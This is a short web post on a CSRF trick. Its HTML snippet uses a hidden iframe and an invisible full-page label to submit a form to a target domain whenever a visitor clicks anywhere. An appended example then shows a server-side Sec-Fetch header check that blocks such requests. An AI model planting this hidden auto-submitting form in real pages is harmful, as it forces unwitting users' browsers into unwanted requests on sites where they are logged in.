An interesting CSRF attack

I found this post very interesting for a number of reasons. Mainly because the label / input relationship is behaviour driven by HTML, which shouldn’t really be happening. After looking at this a bit, I made a variation (more focused on villainish sneakery) that will allow the transparent submission of a form to an iframe if the user clicks anywhere on the page, without the aid of JavaScript, just as in rvdh’s example. Plenty of nastiness can ensue.

<iframe name="my_frame" src="" style="display:none"></iframe>
<form action="http://targetdomain.com" target="my_frame">
	<p>
		<label for="submit" style="position:fixed;top:0;right:0;bottom:0;left:0">&nbsp;</label>
		<input type="submit" id="submit" style="display:none"/>
	</p>
</form>
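
On the receiving side, the request this form produces can be recognised: it is a cross-site navigation whose destination is an iframe. The following is an added example, not part of the original post, of a server-side check on the browser-set Sec-Fetch-* request headers; the function name, the sample labels and the sample requests are constructed for illustration.

```javascript
// Added example (not from the original post). Function and sample names are
// hypothetical; the Sec-Fetch-* request headers are set by the browser.
const SAFE_METHODS = new Set(["GET", "HEAD", "OPTIONS"]);

function isRequestAllowed(method, headers) {
  // Normalise header names so the lookup works with any casing.
  const h = {};
  for (const [name, value] of Object.entries(headers)) {
    h[name.toLowerCase()] = value;
  }
  const site = h["sec-fetch-site"];
  // No Fetch Metadata (older browser, non-browser client): this check cannot
  // judge the request, so other CSRF defences such as tokens must decide.
  if (site === undefined) return true;
  // Requests from our own origin or site, or typed/bookmarked URLs ("none").
  if (site === "same-origin" || site === "same-site" || site === "none") {
    return true;
  }
  // Cross-site: accept only a top-level navigation with a safe method, so
  // ordinary inbound links keep working. A form submitted into a frame
  // arrives with Sec-Fetch-Dest "iframe" and is refused.
  return (
    h["sec-fetch-mode"] === "navigate" &&
    h["sec-fetch-dest"] === "document" &&
    SAFE_METHODS.has(method.toUpperCase())
  );
}

// Constructed sample requests (not captured traffic).
const SAMPLES = [
  { label: "cross-site form into hidden iframe", method: "GET",
    headers: { "Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Dest": "iframe" } },
  { label: "cross-site link, top-level", method: "GET",
    headers: { "Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Dest": "document" } },
  { label: "cross-site POST, top-level", method: "POST",
    headers: { "Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Dest": "document" } },
  { label: "same-origin form POST", method: "POST",
    headers: { "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Dest": "document" } },
];

function evaluateSamples() {
  return SAMPLES.map((s) => ({ label: s.label, allowed: isRequestAllowed(s.method, s.headers) }));
}

for (const r of evaluateSamples()) console.log(r.allowed ? "allow " : "reject", r.label);
```

A cross-site top-level GET still passes this check, so endpoints that change state on GET need their own protection.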
